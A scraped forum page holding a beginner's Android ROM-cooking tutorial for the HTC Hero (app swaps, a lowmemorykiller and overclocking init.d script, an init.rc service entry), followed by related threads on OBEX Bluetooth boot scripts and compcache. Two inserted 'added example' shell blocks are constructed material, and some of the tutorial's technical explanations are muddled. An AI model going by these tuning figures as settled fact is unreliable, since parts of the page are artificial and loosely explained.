Yes, ROM cooking with any kitchen is easy enough for anyone to start with, but I think it's better to have a clear tutorial for a newbie like me. After searching for some time, I came up with this post. It may not be a perfect guide, but at least it's better than starting from nothing.
This guide is made in Thailand, that's why I add the Thai keyboard.
Sorry if I made any mistakes; please tell me so I can fix them.
Thanks: pj from droidsans, eRobot from pdamobiz (these two guys are Thai devs who helped me so much)
For dsixda, your kitchen is amazing, love it so much.
For what?
GoLauncherEX -> default(ADWLauncher)
There are many reasons why I would say GoLauncherEX is better than ADWLauncher: having a task manager and uninstaller built in saves us from wasting any more space on applications. GoLauncherEX also provides a lot of FREE widgets, while some other launchers may ask you to pay extra, and the best characteristic of all is "this-thing-flows-fluently"; you may not believe how little RAM it consumes.
MIUI music player -> default(Music)
MIUI (Me-U-I) is one of the most popular Chinese ROMs, as you can see on Android phones recently. What impressed me the most in MIUI is the music player: it allows you to shuffle the music by just shaking the phone (as you have seen in many Apple products) and provides a playlist function, which I found very convenient.
Gallery2D -> default(Gallery3D)
To be honest with you, Gallery3D is not going to be used in this article. Its beautiful effects (which do no good beyond being beautiful) consume a lot of resources and take forever to load the pictures. This issue brings me to Gallery2D, which has the same abilities except for the effects.
DroidSansThaiKeyboard -> default
Another sweetener in the recipe, from a Thai Android developer. Custom ROMs usually do not provide a Thai keyboard, and since I am cooking my own ROM right now, I decided to drop it in!
CPU 19,710 smartassV2 -> default(264, 518)
The kernel that I use is called "flykernel-13"; many versions have been released and this guy has never disappointed me. We are going to overclock at the speed of 19-710 MHz, and I use smartassV2 as the CPU governor. The reason why I chose smartassV2 instead of ondemand is that smartassV2 does not run at the maximum or minimum speed all the time; it has ideal frequencies that store two CPU values, set to 518 and 352 for screen on and off respectively.
Minimum free memory optimization
Theoretically, Android is going to clear and retrieve the memory automatically, but this operation is sometimes too slow. What we can do is change the minimum and maximum limits of the CPU before Android will recall to use RAM. Unfortunately, the HTC Hero has such a tiny memory capacity compared to recent Android phones; therefore, background applications should be terminated in order to save memory for the application currently in use.
Let’s get it started, shall we?
Prepare ingredients
Base rom: Mine is Elelinux-7.1.0-RC1-Hero-v3.5-Light
Android SDK: Just in case we have to use the ADB
dsixda Android kitchen:
Other packages such as .apk applications and a kernel (in case you want to change it)
Set up the kitchen
First of all, you can download dsixda kitchen from here:
http://forum.xda-developers.com/showthread.php?t=633246v
Although the owner of dsixda stopped developing it a while ago, dsixda is still very popular among developers. So far I haven’t seen any kitchen that works as easily as this one.
Steps of installation here, works well on windows, linux and mac:
http://forum.xda-developers.com/showpost.php?p=5626300&postcount=3
Find your base rom
Before cooking, we need to prepare the ingredients, and the most important thing in this process is the base ROM. I suggest that you find a base ROM to work with, but if not, this kitchen is able to work with an official ROM or a nandroid backup. The instructions for importing a ROM into the kitchen should be at the bottom of the forum post. (http://forum.xda-developers.com/showpost.php?p=5626300&postcount=3)
Extract the base rom
After you have imported the base ROM into the kitchen, unzip the file and follow these steps:
Open the terminal and go to the directory of the kitchen image we created previously by using the command:
cd /Volumes/kitchen
then type:
./menu
to activate the kitchen; the screen will be as shown below.
Enter 1 and press Enter; the kitchen will ask about setting up the WORKING folder. Follow the provided instructions and accept the defaults. At the end, we are going to have a folder named WORKING_*****_***** which contains our ROM; every configuration will be done in here.
Add more applications
We have two choices for adding applications to the ROM: one is to add them before the installation (which means they will become system applications; note that you won’t be able to uninstall such an application unless you use Titanium Backup to take out the root access and uninstall from that); the second is to install them as user applications (which can be uninstalled later on).
System applications
In WORKING_xxx, go to the folder system > app. You will see many .apk files; these are the base applications on your phone: Settings.apk, Calendar.apk, etc.
Erase the .apk files that you don’t want in the ROM (caution: you may erase some important base applications, so only pick out the ones you really know, and leave all the rest).
Copy .apk files from other sources in here. If I were going to add GoLauncherEX, I would browse to WORKING_xxx > system > app, erase the file named Launcher2.apk (this is the default launcher that comes with my base ROM), then insert GoLauncherEX.apk into this folder (haven’t got the GoLauncherEX file? Google it!)
User applications
Open kitchen at the main menu.
type 0 to get to the Advanced options
type 13 to Enable /data/app
Follow the instructions of System applications except for the path, change it to:
WORKING_xxx > data > app
Minfree memory scripting
There are many applications in the Android Market that are able to handle this part, but since we are building our own ROM, it makes more sense to manage it before we flash the ROM. It may be complicated, but I guarantee it is worth doing.
The kitchen has a function to do this for us, but it was kind of messed up for me: somehow, after you restart the phone, every setting goes back to default. So I decided to write a script to make it actually work even after we restart the machine.
We are going to add the script in system/etc/init.d/02memcputweak; if you can’t find a file named 02memcputweak, then create one of your own.
We are going to use the script by Juwe11 from XDA as the default for minfree memory (http://forum.xda-developers.com/showthread.php?t=1111145). Following the link, you will see a script like this:
Code:
#!/system/bin/sh
# Copyright© 2011 Juwe11
# 13.8.2011 Updated VM values - Thanks to [Kalis] for help
# 18.8.2011 Added oom_adj values
# 19.9.2011 Updated VM and LMK values
if [ -e /sys/module/lowmemorykiller/parameters/adj ]; then
    echo "0,1,2,4,6,15" > /sys/module/lowmemorykiller/parameters/adj
fi
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
    echo "2560,4096,5632,10240,11776,14848" > /sys/module/lowmemorykiller/parameters/minfree
fi
if [ -e /proc/sys/vm/swappiness ]; then
    echo "20" > /proc/sys/vm/swappiness
fi
if [ -e /proc/sys/vm/vfs_cache_pressure ]; then
    echo "70" > /proc/sys/vm/vfs_cache_pressure
fi
if [ -e /proc/sys/vm/dirty_expire_centisecs ]; then
    echo "3000" > /proc/sys/vm/dirty_expire_centisecs
fi
if [ -e /proc/sys/vm/dirty_writeback_centisecs ]; then
    echo "500" > /proc/sys/vm/dirty_writeback_centisecs
fi
if [ -e /proc/sys/vm/dirty_ratio ]; then
    echo "15" > /proc/sys/vm/dirty_ratio
fi
if [ -e /proc/sys/vm/dirty_background_ratio ]; then
    echo "3" > /proc/sys/vm/dirty_background_ratio
fi
Let’s take a look at this part.
Code:
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
    echo "2560,4096,5632,10240,11776,14848" > /sys/module/lowmemorykiller/parameters/minfree
fi
There are 6 numbers; each one corresponds to a different class of process:
position 1 : 2560 -> foreground app ; applications that are currently in use.
position 2 : 4096 -> visible app ; applications that are not currently in use but haven’t finished executing.
position 3 : 5632 -> Secondary server ; services of the operating system that applications need to use.
position 4 : 10240 -> hidden app ; services that applications may need to use, but not right now.
position 5 : 11776 -> content provider ; connections between applications and the content.
position 6 : 14848 -> empty app ; applications that are purposely left in RAM in case you are going to use them again.
*FYI: the numbers above are amounts of pages; if you want them in MB, multiply by 4 and divide by 1024 (X*4/1024). E.g. foreground app is 2560; 2560*4/1024 = 10 MB, which means that if the total free RAM is less than 10 MB, the foreground application will be terminated.
Next problem is, how are we going to manage
Code:
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
    echo "1536,4096,4096,25000,25000,25000" > /sys/module/lowmemorykiller/parameters/minfree
fi
position 1 : 1536 -> foreground app ; applications which are being used right now, pour out some more RAM please.
position 2 : 4096 -> visible app ; applications that haven’t stopped working, so leave them alone.
position 3 : 4096 -> Secondary server ; services that are still in use and should not be terminated.
position 4 : 25000 -> hidden app ; services that applications may or may not use, we are not going to keep these for too long.
position 5 : 25000 -> content provider ; we haven’t used much content from other applications.
position 6 : 25000 -> empty app ; applications that may be left in RAM just in case we are going to use them, which we occasionally do.
OC memory scripting
We are still going to work on the file 02memcputweak. After we have prepared the memory part, we are going to set the speed and the governor of the CPU. The scripts in this part are easy scripts that write to the kernel's configuration files during OS boot.
Code:
#!/system/bin/sh
#
echo 19200 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo 710400 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo smartassV2 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
chmod 0755 /system/etc/init.d/*
Set the value 19200 in /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq as the minimum frequency, and the value 710400 in /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq as the maximum frequency.
After we adjust the speed of the CPU, we are going to adjust the governor as well. For the best performance, I pick smartassV2 and put it in:
/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
Then set the permission of files in init.d by using a command:
chmod 0755 /system/etc/init.d/*
Now we are eventually done with 02memcputweak.
Code:
#!/system/bin/sh
#
# Copyright© 2011 Juwe11
# 13.8.2011 Updated VM values - Thanks to [Kalis] for help
# 18.8.2011 Added oom_adj values
# 19.9.2011 Updated VM and LMK values
if [ -e /sys/module/lowmemorykiller/parameters/adj ]; then
    echo "0,1,2,4,6,15" > /sys/module/lowmemorykiller/parameters/adj
fi
if [ -e /sys/module/lowmemorykiller/parameters/minfree ]; then
    echo "1536,4096,4096,25000,25000,25000" > /sys/module/lowmemorykiller/parameters/minfree
fi
if [ -e /proc/sys/vm/swappiness ]; then
    echo "20" > /proc/sys/vm/swappiness
fi
if [ -e /proc/sys/vm/vfs_cache_pressure ]; then
    echo "70" > /proc/sys/vm/vfs_cache_pressure
fi
if [ -e /proc/sys/vm/dirty_expire_centisecs ]; then
    echo "3000" > /proc/sys/vm/dirty_expire_centisecs
fi
if [ -e /proc/sys/vm/dirty_writeback_centisecs ]; then
    echo "500" > /proc/sys/vm/dirty_writeback_centisecs
fi
if [ -e /proc/sys/vm/dirty_ratio ]; then
    echo "15" > /proc/sys/vm/dirty_ratio
fi
if [ -e /proc/sys/vm/dirty_background_ratio ]; then
    echo "3" > /proc/sys/vm/dirty_background_ratio
fi
echo 19200 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq
echo 710400 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
echo smartassV2 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
chmod 0755 /system/etc/init.d/*
Last step: to make our script work in the boot stage of Android, we have to insert
service script /system/etc/init.d/02memcputweak
    oneshot
into the file init.rc, which is located in WORKING_xxx > system > etc. The file will look similar to the text below:
Code:
# CyanogenMod Extras
# Compcache - handle at boot
service compcache /system/bin/handle_compcache
    user root
    group root
    oneshot
service script /system/etc/init.d/02memcputweak
    oneshot
Build rom from working directory
Back in the kitchen again, we are now going to pack rom back to .zip file so we could further test it.
In the main menu of the kitchen, there are options for what to do with the ROM; type 99 to build the ROM.
After you have chosen a build option, switch to Interactive Mode (better for the new cook).
Continue pressing Enter throughout the process: zipalign for optimization to reduce RAM usage, and writing the updater-script into the ROM (this is the part that works with recovery and tells it what to do when flashing).
After every process is finished, we will get our rom in the folder OUTPUT_ZIP.
The next thing you have to do is flash and test the rom, enjoy.
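Added example, not part of the original guide: a check that can be run on a workstation before the adj and minfree strings go into 02memcputweak. It pairs each oom_adj level with its threshold, converts pages to kB with the guide's 4 kB page size, and lists levels whose threshold is at or above total RAM. The function names and the TOTAL_KB sample value are assumptions made for this example.

```shell
#!/bin/sh
# Added example: sanity-check lowmemorykiller settings before they go into
# an init.d script such as 02memcputweak. Function names are made up here.

# lmk_table ADJ MINFREE
#   ADJ and MINFREE are the comma-separated strings written to
#   /sys/module/lowmemorykiller/parameters/adj and .../minfree.
#   Prints one "adj pages kB" line per level (1 page = 4 kB, as in the guide).
#   Returns non-zero if the lists differ in length, hold non-numbers,
#   or minfree is not in non-decreasing order.
lmk_table() {
    awk -v adj="$1" -v minfree="$2" 'BEGIN {
        na = split(adj, a, ",")
        nm = split(minfree, m, ",")
        if (na == 0 || na != nm) exit 1
        for (i = 1; i <= na; i++) {
            if (a[i] !~ /^-?[0-9]+$/ || m[i] !~ /^[0-9]+$/) exit 1
            if (i > 1 && m[i] + 0 < m[i - 1] + 0) exit 1
        }
        for (i = 1; i <= na; i++)
            printf "%d %d %d\n", a[i], m[i], m[i] * 4
    }'
}

# lmk_unreachable TOTAL_KB ADJ MINFREE
#   Prints the adj levels whose threshold is at or above TOTAL_KB of RAM.
#   Free memory is always below such a threshold, so processes at that
#   level are permanently eligible for killing.
lmk_unreachable() {
    table=$(lmk_table "$2" "$3") || return 1
    printf '%s\n' "$table" |
        awk -v total="$1" '$3 + 0 >= total + 0 { print $1 }'
}

# Demo. ADJ and the two MINFREE strings are the ones shown in the guide.
# TOTAL_KB is a constructed sample value, not the HTC Hero's actual RAM size.
ADJ="0,1,2,4,6,15"
JUWE11="2560,4096,5632,10240,11776,14848"
GUIDE="1536,4096,4096,25000,25000,25000"
TOTAL_KB=97928

echo "Juwe11 defaults (adj pages kB):"
lmk_table "$ADJ" "$JUWE11"
echo "Guide values (adj pages kB):"
lmk_table "$ADJ" "$GUIDE"
echo "Levels whose threshold is at or above ${TOTAL_KB} kB:"
lmk_unreachable "$TOTAL_KB" "$ADJ" "$GUIDE"
```

Replace TOTAL_KB with the MemTotal figure of the target device to see which levels the chosen thresholds leave permanently eligible for killing.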
can i use it to built a rom for lg p690
This is killer man. You're no noob.
sample rom
Can u give me the sample of rom?bcoz i dont want to use other base rom to cook
Related
Ok, I didn't like to open a new thread about OBEX and android, but, as I explain in this post http://forum.xda-developers.com/showpost.php?p=3932525&postcount=57 , I got OBEX working in my G1, and now I'm thinking about integrating a clean and elegant OBEX support into our ROMS.
Yes, there is already an application in the market for receiving and sending files via OBEX, but I simply don't like to pay for a feature that should be supported by default in every mobile phone.
I was wondering how would be the first approach for integrating the obexserver by default, and it would be really easy executing at boot time something like:
Code:
sdptool add --channel=4 OPUSH
test -d /sdcard/bluetooth_received || mkdir /sdcard/bluetooth_received
cd /sdcard/bluetooth_received && ( while true; do obexserver; done ) &
The only problem, is that disabling bluetooth and enabling it again, it loses the OPUSH service added by sdptool.
So, I'm now trying to find a way to tell the bluetooth daemons that they should add the OPUSH service when they are enabled, and here is where I need your help. Anybody knows how can this be done?
Also, another way would be simply executing a GScript when the OPUSH service is needed.
What do you think?
Thanks!
EDIT: Here is a simple script that enables the OBEX profile and receives 1 file. It is necessary to re-execute it to receive more files.
obex_get.sh:
Code:
#!/system/bin/sh
obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
case "$obex_status" in
    Failed*)
        # bt disabled
        echo "Please, enable bluetooth first!"
        exit
        ;;
    "")
        # bt enabled, but no OPUSH profile
        sdptool add --channel=4 OPUSH
        ;;
    *)
        # bt enabled, opush enabled
        ;;
esac
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
cd /sdcard/bluetooth_downloads && obexserver
EDIT: Daemonized version of the script. It can be run as service at boot time, and every 3 seconds it will check if the opush profile has been lost.
Code:
#!/system/bin/sh
# create the download directory if it doesn't exist
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
while sleep 3; do
    # get bluetooth status
    hcid_status_now="`getprop init.svc.hcid`"
    # do nothing if bluetooth is stopped ('=' is the portable string comparison for test)
    test "$hcid_status_now" = "stopped" && continue
    # if bluetooth is enabled, get opush profile status
    obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
    case "$obex_status" in
        "")
            # bt enabled, but no OPUSH profile
            sdptool add --channel=4 OPUSH; echo
            ;;
        Failed*)
            # bt disabled
            #echo "Please, enable bluetooth first!"; echo
            continue
            ;;
        *)
            # bt enabled, opush enabled
            ;;
    esac
    # if obexserver isn't already running, execute it.
    pidof obexserver >/dev/null || ( cd /sdcard/bluetooth_downloads && obexserver ) &
done
EDIT: Ok, a definitely better version of the daemon:
Code:
#!/system/bin/sh
# create the download directory if it doesn't exist
test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
# in case /sdcard/bluetooth_downloads already exists, and is not a directory. Exit
test -d /sdcard/bluetooth_downloads || exit
# execute the obexserver loop (for it to be multifile)
( cd /sdcard/bluetooth_downloads && while true; do obexserver; done ) &
# execute the sdptool add OPUSH loop
while sleep 3; do
    # get bluetooth status
    hcid_status_now="`getprop init.svc.hcid`"
    # do nothing if bluetooth is stopped ('=' is the portable string comparison for test)
    test "$hcid_status_now" = "stopped" && continue
    # if bluetooth is enabled and no obex profile exists, add it
    sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push" >/dev/null || sdptool add --channel=4 OPUSH
done
Still don't like to query the "sdptool browse local" every 3 seconds
Bugs and corrections are welcome.
juanmasg said:
Ok, I didn't like to open a new thread about OBEX and android, but, as I explain in this post http://forum.xda-developers.com/showpost.php?p=3932525&postcount=57 , I got OBEX working in my G1, and now I'm thinking about integrating a clean and elegant OBEX support into our ROMS.
Yes, there is already an application in the market for receiving and sending files via OBEX, but I simply don't like to pay for a feature that should be supported by default in every mobile phone.
I was wondering how would be the first approach for integrating the obexserver by default, and it would be really easy executing at boot time something like:
Code:
sdptool add --channel=4 OPUSH
test -d /sdcard/bluetooth_received || mkdir /sdcard/bluetooth_received
cd /sdcard/bluetooth_received && ( while true; do obexserver; done ) &
The only problem, is that disabling bluetooth and enabling it again, it loses the OPUSH service added by sdptool.
So, I'm now trying to find a way to say the bluetooth daemons that they should add the OPUSH service when they are enabled, and here is where I need your help. Anybody knows how can this be done?
Also, another way would be simply executing a GScript when the OPUSH service is needed.
What do you think?
Thanks!
I am not really sure how the bluetooth stack works, but does the OPUSH profile have its own process, or is there some way to detect its presence?
If so we could easily implement some detecting mechanism in the loop body.
Another possibility is to check the error returned by obexserver if it implements any.
im gonna check out the source tree for you, cause i was just looking last night. i will post again as a read into the source a lot more
billc.cn said:
I am not really sure how the bluetooth stack works, but does the OPUSH profile have its own process, or is there some way to detect its presence?
If so we could easily implement some detecting mechanism in the loop body.
Another possibility is to check the error returned by obexserver if it implements any.
The obex profile does not have its own process, sdptool simply enables it in one of the bluez daemons (don't know which of them)
The "problem" here is that obexserver does not get any error when I disable bluetooth, it simply continues waiting for a connection. I'll try to look at the openobex API to see if we can get the bluetooth status or force some error. Sorry, my knowledge about the bluetooth protocol is quite limited.
The curious thing about this, is that if I execute obexserver, disable bt, re-enable bt, and add the opush profile, without restarting the obexserver it still works.
juanmasg said:
The obex profile does not have its own process, sdptool simply enables it in one of the bluez daemons (don't know which of them)
The "problem" here is that obexserver does not get any error when I disable bluetooth, it simply continues waiting for a connection. I'll try to look at the openobex API to see if we can get the bluetooth status or force some error. Sorry, my knowledge about the bluetooth protocol is quite limited.
The curious thing about this, is that if I execute obexserver, disable bt, re-enable bt, and add the opush profile, without restarting the obexserver it still works.
so maybe this is running on a separate process? no its entirely own, but maybe a child process? seems kinda weird to me... and its gonna be a while before i can start checking this out along with you, i need to re-download the android repo >.<
As long as you have that script that has to be run every time you want 1 file, would it be possible to do that every, say, 3 seconds in a loop? Maybe even have an obex app where you can press a button to have the script start running the loop and press again to kill the process. I'm thinking something similar to the wifi tether for root users in terms of interface.
EDIT: so something similar to this in terms of scriptage(can't remember the exact syntax for loops)
Code:
#!/system/bin/sh
# loop forever; "true" is the command that always succeeds
while true
do
    obex_status=`sdptool browse local 2>&1| egrep "^Service Name: OBEX Object Push|^Failed to connect"`
    case "$obex_status" in
        Failed*)
            # bt disabled
            echo "Please, enable bluetooth first!"
            exit
            ;;
        "")
            # bt enabled, but no OPUSH profile
            sdptool add --channel=4 OPUSH
            ;;
        *)
            # bt enabled, opush enabled
            ;;
    esac
    test -d /sdcard/bluetooth_downloads || mkdir /sdcard/bluetooth_downloads
    cd /sdcard/bluetooth_downloads && obexserver
    sleep 3
done
corp769 said:
so maybe this is running on a separate process? no its entirely own, but maybe a child process? seems kinda weird to me...
I think that we shouldn't monitor the obex profile status, but spawn the profile activation when bluetooth gets active. This will be more efficient.
We can monitor the bluetooth status with "getprop init.svc.hcid". This could be used in the script loop, but it would save a lot of work if we simply could (de)activate it when the bluetooth gets enabled or disabled.
I'm looking at /etc/bluez in the G1 and in my linux desktop to see if some file could do the magic.
i need to re-download the android repo
be patient my friend
Can't you just do this from init with the other daemons?
service hfag /system/bin/sdptool add --channel=10 HFAG
    user bluetooth
    group bluetooth net_bt_admin
    disabled
    oneshot
service hsag /system/bin/sdptool add --channel=11 HSAG
    user bluetooth
    group bluetooth net_bt_admin
    disabled
    oneshot
...etc
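Added example, not written by any poster in this thread: init starts a service as root unless its stanza carries a `user` option, which is why the hfag/hsag stanzas above drop to `bluetooth`. The filter below lists the services in an init.rc that still run as root. The sample input is constructed from stanzas quoted on this page, and `init_root_services` and `sample_init_rc` are names made up for this example.

```shell
#!/bin/sh
# Added example: list the services in an init.rc that init will run as root.
# A service runs as root when its stanza has no "user" option (or says
# "user root"). Function names are made up for this example.

# init_root_services [FILE]
#   Reads init.rc text from FILE (or stdin) and prints "name executable"
#   for every service that runs as root.
init_root_services() {
    awk '
        # Report the stanza collected so far if it never left root.
        function emit() {
            if (name != "" && (user == "" || user == "root"))
                print name, path
            name = ""
        }
        /^[ \t]*#/ || NF == 0        { next }                 # comments, blanks
        $1 == "service"              { emit(); name = $2; path = $3; user = ""; next }
        $1 == "on" || $1 == "import" { emit(); next }         # other section starts
        name != "" && $1 == "user"   { user = $2 }
        END { emit() }
    ' "$@"
}

# Constructed sample input: compcache and "script" as in the ROM guide's
# init.rc excerpt, hfag as in the post above.
sample_init_rc() {
    cat <<'EOF'
# CyanogenMod Extras
service compcache /system/bin/handle_compcache
    user root
    group root
    oneshot

service script /system/etc/init.d/02memcputweak
    oneshot

service hfag /system/bin/sdptool add --channel=10 HFAG
    user bluetooth
    group bluetooth net_bt_admin
    disabled
    oneshot
EOF
}

sample_init_rc | init_root_services
```

Each name it prints is a stanza worth reviewing before the ROM is built: either the service needs root, or it is missing `user` and `group` lines.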
haha, i have no patience man, i'm in the military, and patience is not a virtue to me, i just want to get sh*t done
as far as what you are talking about, i understand what you mean. i'm also looking at the obex source in my linux distro (fedora 10) and kinda pondering if we could write a completely new routine (as a script for now of course) that would only be called when we need it, as in running it at boot and run in the background constantly. that hopefully wouldn't run up the processor tho...
and by the way, i would really like to help in everyway because i always wanted bluetooth file transfer on my G1
cyanogen said:
Can't you just do this from init with the other daemons?
service hfag /system/bin/sdptool add --channel=10 HFAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
service hsag /system/bin/sdptool add --channel=11 HSAG
user bluetooth
group bluetooth net_bt_admin
disabled
oneshot
...etc
Already tried that, but it didn't work. Those "services" seem to be requested by the a2dp daemon when it starts, and the a2dp daemon starts and stops when bluetooth is enabled or disabled, so we still would need to get our daemon spawned with all the bluetooth stuff.
Thanks anyways.
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
    @Override
    public void handleMessage(Message msg) {
        switch (msg.what) {
        case MESSAGE_REGISTER_SDP_RECORDS:
            //TODO: Don't assume HSP/HFP is running, don't use sdptool,
            if (isEnabled()) {
                SystemService.start("hsag");
                SystemService.start("hfag");
            }
            break;
        case MESSAGE_FINISH_DISABLE:
            finishDisable(msg.arg1 != 0);
            break;
        }
    }
};
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
Thanks cyanogen, that is what I was looking for.
I wanted to avoid to recompile the android core server, but It seems that we'll have to :-/.
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
Exactly. Let's add the opush service here...
I'd love to patch it into my next ROM release
I added to the first post a modified version of the script that can be run as a "daemon".
Anyway, the way to implement this seems to be patching BluetoothDeviceService.java.
cyanogen said:
I'd love to patch it into my next ROM release
Can't wait for it
As for sending files, I was thinking about creating a mime handler that could be used with, p.e Filer (http://android.hlidskialf.com/software/filer) so that it could be able to send files via OBEX also.
Any idea?
cyanogen said:
BluetoothDeviceService.java does the work, would be trivial to patch this in..
Code:
private final Handler mHandler = new Handler() {
@Override
public void handleMessage(Message msg) {
switch (msg.what) {
case MESSAGE_REGISTER_SDP_RECORDS:
//TODO: Don't assume HSP/HFP is running, don't use sdptool,
if (isEnabled()) {
SystemService.start("hsag");
SystemService.start("hfag");
}
break;
case MESSAGE_FINISH_DISABLE:
finishDisable(msg.arg1 != 0);
break;
}
}
};
The more I think about it, the more I feel, that it should be done in ObexServer initialisation (ObexServer.java) ... which should be started from BluetoothDeviceService
here is my question... ok, we have the obex server for receiving files. now as far as sending files, how will that be set up? like will it be a separate script to run the program, or will it be combined with the obex server?
an idea or two... juan, you mentioned about setting up a mime handler to send files. would it be possible to set up the handler for both receiving and sending files? it could most definitely be accomplished by creating a whole separate APK, and have that register the handles for the system, running as a service in the background. also we could use that for a graphical interface in the long run after we get the basics down pat, and have a file browser for sending files. i know this is jumping the gun, but it is all my ideas i have going on. on that note though, i think it would be the best way, unless you have a better idea
EDIT: now that i think of it, the APK would be best off other wise so we wouldnt have to have everyone who wants file transfer to reflash their whole phone just for a partially modified kernel
corp769 said:
EDIT: now that i think of it, the APK would be best off other wise so we wouldnt have to have everyone who wants file transfer to reflash their whole phone just for a partially modified kernel
I'd rather make part of the framework ready to be accepted by the AOSP than some kind of hack running only on rooted devices. Which brings another question: I was just starting to port the obexserver, when I realized that the OpenOBEX library is licensed under LGPL ... can we use it?
Hello Everyone,
First, I did search. That is how I figured out how to disable compcache and enable the swap. It's working great, however since I am no longer using compcache, I would like to make available the RAM that it is using. Here are my free commands:
BEFORE:
# free
free
             total       used       free     shared    buffers
  Mem:       97928      96356       1572          0       8164
 Swap:       24476      15516       8960
Total:      122404     111872      10532
AFTER:
# free
free
             total       used       free     shared    buffers
  Mem:       97928      96416       1512          0        300
 Swap:       31768       3092      28676
Total:      129696      99508      30188
Notice that the Physical Memory is still the same number, despite compcache being disabled (well, atleast swapoff'd) Here is my userinit and you can see that it's just enabling the swap.
#!/system/bin/sh
##adb push userinit.sh /system/sd/
uname_r=`uname -r`
moddir=`find /system/modules -type d -name $uname_r`
#insmod=/system/bin/insmod
#$insmod $moddir/compcache/xvmalloc.ko;
#$insmod $moddir/compcache/ramzswap.ko disksize_kb=32768;
#$insmod $moddir/compcache/ramzswap.ko backing_swap=/dev/block/mmcblk0p3;
#mknod /dev/ramzswap0 b 253 0;
echo 20 > /proc/sys/vm/swappiness;
# Experimental settings
#echo 1 > /proc/sys/vm/page-cluster; # default: 3 Changes Page clustering from 8 to 2.
#echo 5 > /proc/sys/vm/laptop_mode; # default: 0 Helps keep SSD from getting worn.
#echo 5000 > /proc/sys/vm/dirty_expire_centisecs; # default: 3000
#echo 800 > /proc/sys/vm/dirty_writeback_centisecs; # default: 500
#echo 10 > /proc/sys/vm/dirty_background_ratio; # default: 5
#echo 16 > /proc/sys/vm/dirty_ratio; # default: 10
#
#swapon /dev/ramzswap0;
swapon /dev/block/mmcblk0p3;
#Over Clock CPU when in use, puts at lower freq when idle. # if you don't want it.
#echo 128000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq;
#echo 528000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq;
QUESTION: Is there any way to re-allocate the compcache section of my physical RAM to be used again? There is that 24476b that I cannot use, as I'm using a swap.
Thanks for your time.
andjohn said:
Hello Everyone,
First, I did search. That is how I figured out how to disable compcache and enable the swap. It's working great, however since I am no longer using compcache, I would like to make available the RAM that it is using. Here are my free commands:
BEFORE:
# free
free
total used free shared buffers
Mem: 97928 96356 1572 0 8164
Swap: 24476 15516 8960
Total: 122404 111872 10532
AFTER:
# free
free
total used free shared buffers
Mem: 97928 96416 1512 0 300
Swap: 31768 3092 28676
Total: 129696 99508 30188
Notice that the Physical Memory is still the same number, despite compcache being disabled (well, atleast swapoff'd) Here is my userinit and you can see that it's just enabling the swap.
#!/system/bin/sh
##adb push userinit.sh /system/sd/
uname_r=`uname -r`
moddir=`find /system/modules -type d -name $uname_r`
#insmod=/system/bin/insmod
#$insmod $moddir/compcache/xvmalloc.ko;
#$insmod $moddir/compcache/ramzswap.ko disksize_kb=32768;
#$insmod $moddir/compcache/ramzswap.ko backing_swap=/dev/block/mmcblk0p3;
#mknod /dev/ramzswap0 b 253 0;
echo 20 > /proc/sys/vm/swappiness;
# Experimental settings
#echo 1 > /proc/sys/vm/page-cluster; # default: 3 Changes Page clustering from 8 to 2.
#echo 5 > /proc/sys/vm/laptop_mode; # default: 0 Helps keep SSD from getting worn.
#echo 5000 > /proc/sys/vm/dirty_expire_centisecs; # default: 3000
#echo 800 > /proc/sys/vm/dirty_writeback_centisecs; # default: 500
#echo 10 > /proc/sys/vm/dirty_background_ratio; # default: 5
#echo 16 > /proc/sys/vm/dirty_ratio; # default: 10
#
#swapon /dev/ramzswap0;
swapon /dev/block/mmcblk0p3;
#Over Clock CPU when in use, puts at lower freq when idle. # if you don't want it.
#echo 128000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq;
#echo 528000 > /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq;
QUESTION: Is there any way to re-allocate the compcache section of my physical RAM to be used again? There is that 24476b that I cannot use, as I'm using a swap.
Thanks for your time.
hahaha, compcache doesn't take up your physical RAM.
ccyrowski said:
hahaha, compcache doesn't take up your physical RAM.
Ok, so where is it taking from? I understood that compcache is a Compression Swap that runs in RAM. Is that incorrect?
This does not belong in this area plz post questions like this in the Q&A area.
Prod1702 said:
This does not belong in this area plz post questions like this in the Q&A area.
Sorry, Mods please close. Reposting in QA
